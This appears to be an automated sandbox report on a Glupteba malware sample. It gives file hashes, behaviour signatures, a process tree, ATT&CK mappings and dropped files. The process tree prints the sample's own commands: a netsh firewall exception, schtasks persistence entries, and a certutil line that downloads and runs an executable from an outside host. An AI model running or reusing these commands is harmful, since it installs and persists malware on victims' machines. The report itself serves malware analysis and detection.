Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    24-05-2022 13:47

General

  • Target

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe

  • Size

    3.9MB

  • MD5

    2064e3bb7a3826464992decb043a1c13

  • SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

  • SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

  • SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Windows security bypass 2 TTPs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 12 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 5 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
    "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1992
    • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
      "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:972
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:1880
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1204
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1808
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1980
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1780
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524135259.log C:\Windows\Logs\CBS\CbsPersist_20220524135259.cab
    1⤵
    • Drops file in Windows directory
    PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Install Root Certificate

1
T1130

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    2064e3bb7a3826464992decb043a1c13

    SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

    SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

    SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    2064e3bb7a3826464992decb043a1c13

    SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

    SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

    SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

  • \Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    2064e3bb7a3826464992decb043a1c13

    SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

    SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

    SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

  • memory/972-59-0x0000000000000000-mapping.dmp
  • memory/1732-68-0x00000000013F0000-0x0000000001796000-memory.dmp
    Filesize

    3.6MB

  • memory/1732-70-0x0000000000400000-0x0000000001021000-memory.dmp
    Filesize

    12.1MB

  • memory/1732-69-0x00000000013F0000-0x0000000001796000-memory.dmp
    Filesize

    3.6MB

  • memory/1732-66-0x0000000000000000-mapping.dmp
  • memory/1780-84-0x0000000000000000-mapping.dmp
  • memory/1880-61-0x000007FEFBA91000-0x000007FEFBA93000-memory.dmp
    Filesize

    8KB

  • memory/1880-60-0x0000000000000000-mapping.dmp
  • memory/1960-62-0x0000000001260000-0x0000000001606000-memory.dmp
    Filesize

    3.6MB

  • memory/1960-63-0x0000000000400000-0x0000000001021000-memory.dmp
    Filesize

    12.1MB

  • memory/1960-58-0x0000000001260000-0x0000000001606000-memory.dmp
    Filesize

    3.6MB

  • memory/1992-57-0x0000000000400000-0x0000000001021000-memory.dmp
    Filesize

    12.1MB

  • memory/1992-56-0x0000000001560000-0x0000000001C55000-memory.dmp
    Filesize

    7.0MB

  • memory/1992-55-0x00000000011B0000-0x0000000001556000-memory.dmp
    Filesize

    3.6MB

  • memory/1992-54-0x00000000011B0000-0x0000000001556000-memory.dmp
    Filesize

    3.6MB